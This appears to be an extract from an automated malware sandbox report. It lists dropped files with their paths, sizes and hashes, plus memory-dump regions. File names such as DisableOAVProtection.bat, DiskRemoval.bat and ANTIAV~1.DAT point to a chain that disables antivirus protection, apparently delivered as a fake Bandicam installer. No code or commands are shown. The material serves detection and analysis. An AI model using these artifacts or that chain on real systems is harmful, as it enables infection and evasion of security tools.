2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\kkDvi\DisableOAVProtection.bat
Filesize
136KB

MD5
ed77c2b2866fc09850a317f2620f4f9c

SHA1
ed1d7485a1111bd553ffe81927260652718a1c39

SHA256
763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

SHA512
4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

Download Submit
C:\ProgramData\kkDvi\DiskRemoval.bat
Filesize
211B

MD5
0f00552cee3a31dc4e8adc2738ca6d76

SHA1
85f0353b58b6749eee6b06101b05db242d44d0c2

SHA256
1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

SHA512
137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

Download Submit
C:\ProgramData\kkDvi\MMF.vbs
Filesize
67KB

MD5
62c210400fef1cb41efa4c8b2c963964

SHA1
fa471dcf721b5f61a8794a75e3a9226e79b3ec80

SHA256
ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

SHA512
64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

Download Submit
C:\ProgramData\kkDvi\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
98b40633ad9ed474b501858eaf95a5e2

SHA1
a021606bc9cad62813e7b3ecc46ce1dd11f68626

SHA256
f2eb6e6dab594455f0ddf9a30f9f1cdb40c0789b14c6f7150a63df3029f8f023

SHA512
470a25c7ee6bc6efa11a21708915c918e3ead2394db5db8a1b758e15945466cc17a861f43f1dae8a396094a63b68eb2339769dd345db2925ee873524d9ea681c

Download Submit
C:\ProgramData\kkDvi\extracted\file_1.zip
Filesize
3.3MB

MD5
35f26c903cf0767f4abce71d98b5876d

SHA1
be89ca726a39d27a93919a0fbeb3c537769c2d2f

SHA256
4f26044911e8b77343a11d011c6bc92fff56d5182ed82d75edfd2e0893250f37

SHA512
b778187dd9931e02226b654eddbdc00a1f438a91ffcd8fa0fc130018759066d74aa9b4bc8148a0cf22e961e573e6b144469648105db3c595e17011ade9a1e945

Download Submit
C:\ProgramData\kkDvi\extracted\file_2.zip
Filesize
3.3MB

MD5
8a67f88eca9431e55627b34be2e8a84e

SHA1
4d259bffc31f3a0148d009f1ef412d25c42326e0

SHA256
5d789b9194de03984b0af00fb4831225d526c812ddabe9c3cabdcf269b784a1e

SHA512
7d9e8190bc61decfa2bf61797ebdc5bd50b2652dfa9b30f8f27ddcc500d415b46f35b1f1d8daab2ea70995b859f5942ee89d4f7cb3e9107da65be8f65012660e

Download Submit
C:\ProgramData\kkDvi\extracted\file_3.zip
Filesize
3.3MB

MD5
d0cc732732bf8be0bf08a6b5d8b65406

SHA1
0cf74e971ddbd71f66959dc19c11cc827e9b32b3

SHA256
25185d1234e7c93a7d8e650c033ce0f8a99a3882a4137ca2dfc2043e4d312d05

SHA512
3631d3f64947835a12322b97dc185b2915e9286f612fd701aef2b052a510a310fa6b3590599fb0550f90dc7c1938fd8a2862e9170e02c205aa8fcea361813798

Download Submit
C:\ProgramData\kkDvi\extracted\file_4.zip
Filesize
3.3MB

MD5
acdfeefb0e7e0f4caa08d17f029097ac

SHA1
6ec910af6e5310efbd7705bd4559c036eeeffe1d

SHA256
5b04f2f3020beaf54624b027bac736a7f0df621b3b10f2ca36eb70c5ab3a4998

SHA512
443dfe57378186d3af3548533ca86dd9284ec1517a5f719f3816835bc64c05a4549d78088c2208295f456618f4af426109a3d3a19a2562599cf5df42f9924c98

Download Submit
C:\ProgramData\kkDvi\extracted\file_5.zip
Filesize
4.8MB

MD5
a49a3df64df5ac8f7663c293c8f9b988

SHA1
b371b385f6856ddfc2fda4c207a9685a054c6c5c

SHA256
d011cb30824aa41c5083941994c882a0925fb9a72cd8b1bced3e1f49b3c759d6

SHA512
0a9b5271bd513584b9f69017cb08d526e59c760a692641177fb281f4b64b06bf95ea66d549ab13dbaa2b8e2cda4d72771e86bedd76041882b89bb13827845e66

Download Submit
C:\ProgramData\kkDvi\extracted\tGBpax_SqZ.exe
Filesize
5.1MB

MD5
c82505da7972f638a9aa294541f3ebd6

SHA1
4a24560d506285ea81e148a6902cae2bde1b26ac

SHA256
d55785c6b1fa6a3bf0370ea37a0b91b785460bb47f03dcfafc33eb5a6f7d7db6

SHA512
c212182e4e8061493a478f5c77147c0bd327894cc0b7ccb360b65f41b306c5dc548eeb89690fd748cadcf36e0567bb0f3c6028978fe8cd09af63cee2be9cdbf2

Download Submit
C:\ProgramData\kkDvi\file.bin
Filesize
4.8MB

MD5
ddeef4503c5c0b6f8f455679df51da81

SHA1
aca8b9ce01d7c14c882eff4a44823f68a55956e1

SHA256
eee9e6b60f2f8c585157e4431c14572d428d95a5928cee4a087b858a2a8a6e7e

SHA512
930ae0f43f2bb9dd28b400ac1296c9985bb5228a61b5f9f1f45dcb0e58270d10d6f84f736ed03e201534e59d1afbb5a10e6abbf411451a871285cf0f1344f6fb

Download Submit
C:\ProgramData\kkDvi\main.bat
Filesize
415B

MD5
93ecbb04a97f0b01468721390c49dd75

SHA1
f7f78ccadcbf2057cf5a77e52efee603c3c62c68

SHA256
68f78f7af15489552e50f00ff115216eaf9cfb9c3bf1792c8b9edd1c3afe0d40

SHA512
87ba7abceb1be94a63d3ddee9d2d4348f0d6fabefd1411a742b11acabe0f29d0ef1d44b78667aad73f234067db8407da5d7c9c0690925a5448061d5855eb5fa0

Download Submit
C:\ProgramData\kkDvi\tGBpax_SqZ.exe
Filesize
5.1MB

MD5
c82505da7972f638a9aa294541f3ebd6

SHA1
4a24560d506285ea81e148a6902cae2bde1b26ac

SHA256
d55785c6b1fa6a3bf0370ea37a0b91b785460bb47f03dcfafc33eb5a6f7d7db6

SHA512
c212182e4e8061493a478f5c77147c0bd327894cc0b7ccb360b65f41b306c5dc548eeb89690fd748cadcf36e0567bb0f3c6028978fe8cd09af63cee2be9cdbf2

Download Submit
C:\ProgramData\kkDvi\tGBpax_SqZ.exe
Filesize
5.1MB

MD5
c82505da7972f638a9aa294541f3ebd6

SHA1
4a24560d506285ea81e148a6902cae2bde1b26ac

SHA256
d55785c6b1fa6a3bf0370ea37a0b91b785460bb47f03dcfafc33eb5a6f7d7db6

SHA512
c212182e4e8061493a478f5c77147c0bd327894cc0b7ccb360b65f41b306c5dc548eeb89690fd748cadcf36e0567bb0f3c6028978fe8cd09af63cee2be9cdbf2

Download Submit
C:\Users\Admin\AppData\Local\Temp\19f93e2a-4d97-4e0c-ade5-972e41ee6cf8\f.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-63LIH.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-63LIH.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-63LIH.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-63LIH.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-A5K3N.tmp\5380339dce6f8040d5978ff453e9bc97dc621887e22d4ac80a00fe38c2ed1d03.tmp
Filesize
2.5MB

MD5
5cea51722c4aebe9322f76a27370d7d8

SHA1
1e479681b9a61d7f42ed349780f0ae93f477b4c8

SHA256
a1b1f6c621428e180248736534ac0d23531f50ecaceaadfe420fed026ecc45a0

SHA512
fb10d9fce508894624902fbc18318b7fcfa0310141e340060b715ba0b060cfb04ecc9489d65915e50df1c74c47ced74ee69f0a668febe4f460ec409b4dcf7d87

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-S3TVM.tmp\Bandicam.4.5.8.1673.tmp
Filesize
939KB

MD5
2624dd7f54b9132196ea129114ac9828

SHA1
50082f8b6e179fa509d1575fd4536abdcbf229fe

SHA256
9b92942e7066168d9b95fb9004abe21254b28a076ff1988bea781d75fc48276f

SHA512
fd07a56e7fd9289cc5e7ebd9b1185950a708ee5edd609be67d38be5364f549ff08014abfabd38b6df7bb223f9f9031f17a53c37614441ac37c2592e6df17b31e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-T0LJD.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
memory/176-142-0x0000000000000000-mapping.dmp

Download
memory/628-173-0x0000000000000000-mapping.dmp

Download
memory/652-200-0x0000000000000000-mapping.dmp

Download
memory/716-182-0x0000000000000000-mapping.dmp

Download
memory/744-180-0x0000000000000000-mapping.dmp

Download
memory/924-206-0x0000000000000000-mapping.dmp

Download
memory/1132-177-0x0000000000000000-mapping.dmp

Download
memory/1192-140-0x0000000000000000-mapping.dmp

Download
memory/1192-159-0x0000000009690000-0x000000000969F000-memory.dmp

Filesize
60KB

Download
memory/1192-235-0x0000000072F70000-0x0000000072F8B000-memory.dmp

Filesize
108KB

Download
memory/1304-205-0x0000000000000000-mapping.dmp

Download
memory/1464-213-0x0000000000000000-mapping.dmp

Download
memory/1612-208-0x0000000000000000-mapping.dmp

Download
memory/1632-188-0x0000000000000000-mapping.dmp

Download
memory/1680-165-0x0000000000000000-mapping.dmp

Download
memory/1812-146-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1812-137-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/1812-135-0x0000000000000000-mapping.dmp

Download
memory/1912-203-0x0000000000000000-mapping.dmp

Download
memory/2264-212-0x0000000000000000-mapping.dmp

Download
memory/2348-202-0x0000000000000000-mapping.dmp

Download
memory/2468-231-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/2468-233-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/2468-230-0x0000000000000000-mapping.dmp

Download
memory/2468-234-0x0000000000400000-0x0000000000493000-memory.dmp

Filesize
588KB

Download
memory/2472-162-0x0000000000000000-mapping.dmp

Download
memory/2516-150-0x0000000000000000-mapping.dmp

Download
memory/2696-218-0x0000000000000000-mapping.dmp

Download
memory/2700-183-0x0000000000000000-mapping.dmp

Download
memory/2900-224-0x0000000005A10000-0x0000000005FB4000-memory.dmp

Filesize
5.6MB

Download
memory/2900-222-0x0000000000630000-0x0000000000B8C000-memory.dmp

Filesize
5.4MB

Download
memory/2900-226-0x0000000005460000-0x00000000054F2000-memory.dmp

Filesize
584KB

Download
memory/2900-197-0x0000000000000000-mapping.dmp

Download
memory/2900-225-0x0000000005350000-0x0000000005394000-memory.dmp

Filesize
272KB

Download
memory/2900-223-0x0000000000630000-0x0000000000B8C000-memory.dmp

Filesize
5.4MB

Download
memory/2900-228-0x00000000741B0000-0x0000000074239000-memory.dmp

Filesize
548KB

Download
memory/3048-170-0x0000000000000000-mapping.dmp

Download
memory/3172-154-0x0000000000000000-mapping.dmp

Download
memory/3216-204-0x0000000000000000-mapping.dmp

Download
memory/3272-160-0x0000000000000000-mapping.dmp

Download
memory/3344-193-0x0000000000000000-mapping.dmp

Download
memory/3520-215-0x0000000000000000-mapping.dmp

Download
memory/3560-148-0x0000000000000000-mapping.dmp

Download
memory/3608-217-0x0000000000000000-mapping.dmp

Download
memory/3660-152-0x0000000000000000-mapping.dmp

Download
memory/3664-210-0x0000000000000000-mapping.dmp

Download
memory/3888-211-0x0000000000000000-mapping.dmp

Download
memory/4092-184-0x0000000000000000-mapping.dmp

Download
memory/4120-199-0x0000000000000000-mapping.dmp

Download
memory/4228-130-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/4228-145-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/4312-201-0x0000000000000000-mapping.dmp

Download
memory/4416-219-0x0000000000000000-mapping.dmp

Download
memory/4516-196-0x0000000000000000-mapping.dmp

Download
memory/4564-153-0x0000000000000000-mapping.dmp

Download
memory/4572-207-0x0000000000000000-mapping.dmp

Download
memory/4704-209-0x0000000000000000-mapping.dmp

Download
memory/4708-214-0x0000000000000000-mapping.dmp

Download
memory/4736-192-0x0000000000000000-mapping.dmp

Download
memory/4796-216-0x0000000000000000-mapping.dmp

Download
memory/4852-166-0x0000000000000000-mapping.dmp

Download
memory/4976-132-0x0000000000000000-mapping.dmp

Download
memory/5008-171-0x0000000000000000-mapping.dmp

Download
memory/5020-172-0x0000000000000000-mapping.dmp

Download